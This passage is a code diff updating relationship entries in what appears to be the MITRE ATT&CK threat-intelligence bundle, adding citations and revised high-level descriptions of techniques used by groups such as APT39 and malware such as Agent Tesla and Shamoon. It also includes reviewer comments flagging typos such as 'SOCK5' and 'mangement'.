+ "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.",
"url": "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
- "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019."
+ "source_name": "Talos MuddyWater May 2019"
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"type": "relationship",
- "modified": "2019-06-28T15:30:59.020Z",
+ "modified": "2020-05-18T19:04:38.145Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -117897,12 +119053,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -117932,23 +119088,28 @@
],
"external_references": [
{
- "source_name": "Fortinet Agent Tesla April 2018",
+ "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.",
"url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
- "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018."
+ "source_name": "Fortinet Agent Tesla April 2018"
},
{
"source_name": "Fortinet Agent Tesla June 2017",
"url": "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
"description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) collects the system's computer name and also has the capability to collect information on the processor, memory, and video card from the system.(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Malwarebytes Agent Tesla April 2020)",
"id": "relationship--b509e591-b086-4631-a9ba-5a5dc80de8d0",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-04-16T14:30:35.435Z",
+ "modified": "2020-05-28T23:41:03.868Z",
"created": "2019-01-29T18:44:04.927Z"
},
{
@@ -118080,7 +119241,7 @@
{
"id": "relationship--4f13e788-b0da-457d-89b1-64196c9627b8",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017) The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).(Citation: ESET OceanLotus Mar 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -118105,7 +119266,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
"type": "relationship",
- "modified": "2019-07-17T13:11:38.711Z",
+ "modified": "2020-06-19T20:04:12.612Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -118206,16 +119367,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.728Z",
+ "modified": "2020-04-21T23:09:31.576Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -118489,12 +119650,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--448a35fc-fecf-4373-9888-30c37dd1d56a",
@@ -118699,12 +119860,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055"
},
{
"id": "relationship--c6dc9631-b324-47d1-8bbd-975d20fa5e58",
@@ -119290,12 +120451,12 @@
"url": "https://github.com/SpiderLabs/Responder"
}
],
- "source_ref": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e"
},
{
"id": "relationship--4f3473a4-f5f5-43d8-a4ec-589763695942",
@@ -120432,36 +121593,15 @@
"description": "Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018."
}
],
- "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses macros for execution.(Citation: TrendMicro MacOS April 2018)",
+ "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses Word macros for execution.(Citation: TrendMicro MacOS April 2018)",
"id": "relationship--60bab055-6927-4240-8716-6218dc131aa9",
"source_ref": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29",
"relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"type": "relationship",
- "modified": "2020-03-19T19:09:17.815Z",
+ "modified": "2020-06-23T20:11:11.926Z",
"created": "2019-01-30T19:18:20.194Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Cybereason Cobalt Kitty 2017",
- "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
- "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf"
- }
- ],
- "description": "[Denis](https://attack.mitre.org/software/S0354) executes shellcode on the victim's machine.(Citation: Cybereason Cobalt Kitty 2017)",
- "id": "relationship--771f612d-ba60-4c3b-a2aa-30ba107ebb50",
- "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
- "type": "relationship",
- "modified": "2020-03-20T17:02:09.502Z",
- "created": "2019-01-30T20:01:45.520Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -120493,7 +121633,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
"type": "relationship",
- "modified": "2019-07-24T19:17:09.484Z",
+ "modified": "2020-06-24T14:37:18.197Z",
"created": "2019-02-01T14:35:39.623Z"
},
{
@@ -120531,11 +121671,16 @@
"source_name": "FireEye APT33 Guardrail",
"url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
"description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "(Citation: FireEye APT33 Guardrail)",
+ "description": "(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)",
"type": "relationship",
- "modified": "2019-06-28T15:05:33.688Z",
+ "modified": "2020-06-22T20:15:32.325Z",
"created": "2019-02-05T13:14:45.865Z"
},
{
@@ -120741,11 +121886,11 @@
"source_name": "Impacket Tools"
}
],
- "description": "[Impacket](https://attack.mitre.org/software/S0357) modules like ntlmrelayx and smbrelayx can be used in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040) and [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171) to gather NetNTLM credentials for [Brute Force](https://attack.mitre.org/techniques/T1110) or relay attacks that can gain code execution.(Citation: Impacket Tools)",
+ "description": "[Impacket](https://attack.mitre.org/software/S0357) modules like ntlmrelayx and smbrelayx can be used in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040) and [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001) to gather NetNTLM credentials for [Brute Force](https://attack.mitre.org/techniques/T1110) or relay attacks that can gain code execution.(Citation: Impacket Tools)",
"relationship_type": "uses",
"id": "relationship--0318431e-ad44-44c7-97be-686d4efe79f4",
"type": "relationship",
- "modified": "2019-04-18T21:49:12.807Z",
+ "modified": "2020-03-31T22:20:18.066Z",
"created": "2019-02-07T19:13:01.960Z"
},
{
@@ -121781,13 +122926,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) leveraged spearphishing emails with malicious attachments to initially compromise victims. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) leveraged spearphishing emails with malicious attachments to initially compromise victims. (Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer February 2018)",
"relationship_type": "uses",
"id": "relationship--f60a3a4e-ba53-47ba-8e31-e301f3983f6e",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.389Z",
+ "modified": "2020-05-22T19:37:14.333Z",
"created": "2019-02-21T21:11:08.102Z"
},
{
@@ -121804,11 +122954,21 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "(Citation: FireEye APT39 Jan 2019)",
+ "description": "(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.856Z",
+ "modified": "2020-05-29T13:22:52.472Z",
"created": "2019-02-21T21:12:55.702Z"
},
{
@@ -121825,11 +122985,26 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Dark Reading APT39 JAN 2019",
+ "url": "https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764",
+ "description": "Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "(Citation: FireEye APT39 Jan 2019)",
+ "description": "(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Dark Reading APT39 JAN 2019)(Citation: Symantec Chafer February 2018)",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.861Z",
+ "modified": "2020-05-29T13:22:52.503Z",
"created": "2019-02-21T21:12:55.710Z"
},
{
@@ -121846,11 +123021,16 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "Dark Reading APT39 JAN 2019",
+ "url": "https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764",
+ "description": "Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020."
}
],
- "description": "(Citation: FireEye APT39 Jan 2019)",
+ "description": "(Citation: FireEye APT39 Jan 2019)(Citation: Dark Reading APT39 JAN 2019)",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.858Z",
+ "modified": "2020-05-22T18:17:56.892Z",
"created": "2019-02-21T21:12:55.714Z"
},
{
@@ -121907,13 +123087,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) has been seen using RDP for lateral movement and persistence. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has been seen using RDP for lateral movement and persistence, in some cases employing the rdpwinst tool for mangement of multiple sessions. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)",
"relationship_type": "uses",
"id": "relationship--42ddce39-b653-4466-b7ff-a9554029f1c6",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.432Z",
+ "modified": "2020-05-29T13:22:52.530Z",
"created": "2019-02-21T21:17:37.811Z"
},
{
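Review bot: Typo in the rewritten description of this relationship: `mangement of multiple sessions` should read `management of multiple sessions`; the string is rendered verbatim on the ATT&CK group page, so it is worth fixing while the line is being touched. The tool name `rdpwinst` is taken on trust from the BitDefender citation; confirm its spelling and casing against the report so that searches on the tool name match.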
@@ -121949,13 +123134,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) has created scheduled tasks. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has created scheduled tasks for persistence. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)",
"relationship_type": "uses",
"id": "relationship--54d5380e-07a4-49b0-8ffd-c34428c90bbe",
"type": "relationship",
- "modified": "2020-03-28T21:23:36.695Z",
+ "modified": "2020-05-29T13:22:53.001Z",
"created": "2019-02-21T21:17:37.821Z"
},
{
@@ -121985,19 +123175,29 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"external_references": [
{
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) has used nbtscan to discover vulnerable systems. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used nbtscan and custom tools to discover remote systems. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)",
"relationship_type": "uses",
"id": "relationship--964233cc-fa6c-4754-9684-6546eb6d5a4a",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.495Z",
+ "modified": "2020-05-29T14:02:52.638Z",
"created": "2019-02-21T21:17:37.831Z"
},
{
@@ -122033,13 +123233,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) used custom tools to create SOCK5 proxies between infected hosts. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) used custom tools to create SOCK5 and custom protocol proxies between infected hosts. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)",
"relationship_type": "uses",
"id": "relationship--e2ebd73f-9198-49c7-b446-00478a466e78",
"type": "relationship",
- "modified": "2020-03-20T21:49:34.088Z",
+ "modified": "2020-05-29T13:22:53.074Z",
"created": "2019-02-21T21:17:37.928Z"
},
{
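Review bot: `SOCK5` in the rewritten description is a misspelling of the proxy protocol name; since the line is already being edited, change it to `used custom tools to create SOCKS5 and custom protocol proxies between infected hosts.` The typo predates this commit, but the rewrite is the natural place to correct it rather than carrying it into the new text.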
@@ -122117,13 +123322,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) used a custom port scanner known as BLUETORCH (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)",
"relationship_type": "uses",
"id": "relationship--02caaeff-7429-444f-bac2-498fe3a73cfd",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.635Z",
+ "modified": "2020-05-29T13:22:53.006Z",
"created": "2019-02-21T21:17:37.975Z"
},
{
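Review bot: The rewritten description ends without a terminating period before the citations (`for network scanning (Citation: FireEye APT39 Jan 2019)...`), unlike the neighbouring relationship descriptions in this diff, which close the sentence before citing; add `for network scanning. (Citation: ...`. Elsewhere in this diff tool names are linked to their software entry (e.g. Mimikatz is written as `[Mimikatz](https://attack.mitre.org/software/S0002)`); if the bundle has a software object for CrackMapExec, link it the same way — I cannot confirm from this hunk whether one exists.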
@@ -122180,13 +123390,23 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) has sent spearphishing emails in an attempt to lure users to click on a malicious attachment. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has sent spearphishing emails in an attempt to lure users to click on a malicious attachment. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)",
"relationship_type": "uses",
"id": "relationship--4e50db0c-4e54-4266-b675-3b279ec45427",
"type": "relationship",
- "modified": "2020-03-17T13:51:08.389Z",
+ "modified": "2020-05-29T13:22:53.078Z",
"created": "2019-02-22T20:59:17.640Z"
},
{
@@ -123738,31 +124958,36 @@
"target_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
"external_references": [
{
- "source_name": "Symantec Shamoon 2012",
+ "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.",
"url": "https://www.symantec.com/connect/blogs/shamoon-attacks",
- "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019."
+ "source_name": "Symantec Shamoon 2012"
},
{
- "source_name": "FireEye Shamoon Nov 2016",
+ "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html",
"description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.",
- "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"
+ "source_name": "FireEye Shamoon Nov 2016"
},
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
},
{
- "source_name": "Unit 42 Shamoon3 2018",
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
"url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
- "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019."
+ "source_name": "Unit 42 Shamoon3 2018"
+ },
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
}
],
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) attempts to overwrite operating system files and disk structures with image files.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016) In a later variant, randomly generated data was used for data overwrites.(Citation: Unit 42 Shamoon3 2018)",
